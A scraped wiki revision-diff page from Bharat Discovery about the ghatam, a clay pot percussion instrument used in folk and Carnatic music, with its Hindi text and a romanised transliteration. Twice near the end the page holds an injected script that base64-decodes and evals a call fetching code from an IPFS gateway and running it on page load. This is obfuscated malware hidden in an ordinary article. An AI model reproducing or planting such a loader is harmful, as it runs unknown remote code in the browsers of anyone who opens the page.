Difference between revisions of "घटम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''घटम''' एक भारतीय संगीत [[वाद्य यंत्र|वाद्य]] है। यह मूलत: एक विशेष प्रकार की [[मिट्टी]] से और बड़ी सावधानी से पकाकर बनाया गया पात्र होता है।  
+
'''घटम''' एक भारतीय संगीत [[वाद्य यंत्र|वाद्य]] है। यह मूलत: एक विशेष प्रकार की [[मिट्टी]] से और बड़ी सावधानी से पकाकर बनाया गया पात्र होता है।
 +
 
 
*घटम का उपयोग आमतौर पर लोकसंगीत में होता है, किंतु अब यह [[कर्नाटक]] संगीत में भी लोकप्रिय हो गया है।  
 
*घटम का उपयोग आमतौर पर लोकसंगीत में होता है, किंतु अब यह [[कर्नाटक]] संगीत में भी लोकप्रिय हो गया है।  
*कर्नाटक संगीत में वादक घटम को अपने पेट पर औंधा रखकर अंगुलियों और हथेलियों से बजाता है।  
+
*[[कर्नाटक संगीत]] में वादक घटम को अपने पेट पर औंधा रखकर अंगुलियों और हथेलियों से बजाता है।  
 
*[[कश्मीर]] में इस [[वाद्य यंत्र|वाद्य]] को नूत कहा जाता है और इसे सीधा रखकर ही बजाया जाता है।  
 
*[[कश्मीर]] में इस [[वाद्य यंत्र|वाद्य]] को नूत कहा जाता है और इसे सीधा रखकर ही बजाया जाता है।  
  
Line 13: Line 14:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{संगीत वाद्य}}
 
{{संगीत वाद्य}}
[[Category:वादन]]
+
[[Category:वादन]][[Category:संगीत वाद्य]][[Category:संगीत कोश]]
[[Category:संगीत वाद्य]]
 
[[Category:संगीत कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 07:03, 8 August 2014

ghatam ek bharatiy sangit vady hai. yah moolat: ek vishesh prakar ki mitti se aur b di savadhani se pakakar banaya gaya patr hota hai.

  • ghatam ka upayog amataur par lokasangit mean hota hai, kiantu ab yah karnatak sangit mean bhi lokapriy ho gaya hai.
  • karnatak sangit mean vadak ghatam ko apane pet par auandha rakhakar aanguliyoan aur hatheliyoan se bajata hai.
  • kashmir mean is vady ko noot kaha jata hai aur ise sidha rakhakar hi bajaya jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>